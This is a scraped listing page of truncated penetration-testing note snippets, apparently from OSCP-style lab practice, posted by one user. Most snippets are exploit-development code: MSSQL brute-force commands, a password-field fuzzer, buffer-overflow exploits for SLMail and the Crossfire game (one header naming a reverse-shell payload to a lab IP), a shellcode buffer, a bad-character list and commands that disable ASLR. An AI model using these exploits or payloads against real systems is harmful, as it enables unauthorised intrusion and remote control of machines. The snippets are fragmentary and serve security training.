Latest notes for PenTesting- MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
By: ajayverma 2019-06-25 11:08:36

[>] Enumerate MSSQL Servers on the network:

msf > use auxiliary/scanner/mssql/mssql_ping
nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156
Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio.

[>] Bruteforce MSSQL Database:

msf auxiliary(mssql_login) > use auxiliary/scanne...


Score: 0


1. Install OpenSSL

sudo apt-get install openssl

2. Run the following command to generate the self signed SSL certificates:

sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key

3. Enable SSL for Apache

sudo a2enmod ssl

4. Put the default-ssl site available crea...


Score: 0


#!/usr/bin/python
import socket

#create an array of buffers, while incrementing them

buffer=["A"]
counter=100
while len(buffer) <=30:
buffer.append("A"*counter)
counter=counter+200

for string in buffer:
print "Fuzzing PASS with %s bytes" % len(string)
s=socket.socket(socket.AF_INET, socket.SOCK_S...


Score: 0


#!/usr/bin/env ruby

=begin
takes advantage of the LONG_PASS buffer overflow vulnerability in SLMAIL.
uses windows/shell_reverse_tcp payload
connects to 10.11.0.155:1234
encoded with 1 pass of x86/shitaka_ga_nai
=end

require 'socket'

#bad chars = "\x00\x0a\x0d"
#jmp esp addre...


Score: 0

By: ajayverma 2019-06-25 10:11:42

prefix = "\\x41" * 80
eip = "\\x42" * 4
nop = "\\x90" * (400 - 137)
buf = ""
buf += "\\xba\\x8a\\x2a\\xb0\\xa4\\xd9\\xed\\xd9\\x74\\x24\\xf4\\x5d\\x31"
buf += "\\xc9\\xb1\\x1c\\x31\\x55\\x14\\x03\\x55\\x14\\x83\\xed\\xfc\\x68"
buf += "\\xdf\\xda\\xd9\\x34\\xb9\\xa9\\x25\\x7d\\x...


Score: 0

By: ajayverma 2019-06-25 10:11:46

#!/usr/bin/python
import socket

host = "127.0.0.1"

crash = "\x41" * 4379

buffer = "\x11(setup sound " + crash + "\x90\x00#"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
s.connect((host, 13327))
s.send(buffer)
data=s.recv(1024)
print data
...


Score: 0


#!/usr/bin/env ruby

=begin
This exploit takes advantage of a buffer overflow vulnerability during the
sound setup stage of the game Crossfire.
=end

require 'socket'

#total size = 4379
#offset = 4368
#bad chars = "\x00\x0a\x0d\x20"

#add eax, 12 = 83C00C
#jmp eax = FFE0


#create shellcode
#creates a bi...


Score: 0


cat /proc/sys/kernel/randomize_va_space
sudo bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf'
sudo sysctl -p
cat /proc/sys/kernel/randomize_va_space
# verify "0"
ulimit -c unlimited
ulimit -c...


Score: 0

By: ajayverma 2019-06-25 10:11:58

badchars = "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b" +
"\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a" +
"\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4...


Score: 0


There are many distributions of linux, and they all do things a little different regarding default security and built-in tool sets. Which means when engaging these different flavors during a pentest, what works against one linux target to get an interactive shell, may not work against another. Well, not to worry my friends, there are many technique...


Score: 0